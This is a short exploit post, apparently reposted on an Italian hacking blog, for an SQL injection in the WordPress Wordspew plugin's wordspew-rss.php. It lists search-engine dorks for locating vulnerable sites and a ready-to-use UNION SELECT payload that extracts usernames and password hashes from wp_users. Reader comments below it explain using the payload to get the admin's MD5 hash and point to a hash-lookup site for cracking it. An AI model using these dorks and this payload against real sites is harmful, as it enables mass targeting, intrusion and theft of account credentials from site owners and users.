WordPress Plugin (wordspew-rss.php) SQL Injection

#########################################################################
#
# WordPress Plugin (wordspew-rss.php) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################

DORK 1 : allinurl: “wordspew-rss.php”

DORK 2 : allinurl: “wp-content/plugins/wordspew”

DORK 3 : allinurl: “wordspew/wordspew-rss.php”

#########################################################################
EXPLOIT :

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user
_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c)
,4,5/**/FROM/**/wp_users

#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################

6 Risposte to “WordPress Plugin (wordspew-rss.php) SQL Injection”

  1. aleemirko Dice:

    a cosa serve???

  2. ago1980 Dice:

    questa e un exploit scritta in perl ….in parole povere sfrutta il bug presente nel wordspew/wordspew-rss.php ……se il sito e bugato sfruttando questa exploit puoi risalire alla passw..del ADMIN in md5….ciao

  3. trinacriahackers Dice:

    ma allora sei furbo…
    se io la uso su di te ?

  4. ago1980 Dice:

    MMMMMMMMMMM……………NN FUNZIONA SU DI Mè - -”…

  5. #Frodohack# Dice:

    mi sà che funziona su di te… cmq non è possibile scriptare password in md5 mi disp

  6. anonimo Dice:

    ah…non è possibile??? allora vai qui : http://md5.rednoize.com/ e poi dimmi se è impossibile

Lascia una Risposta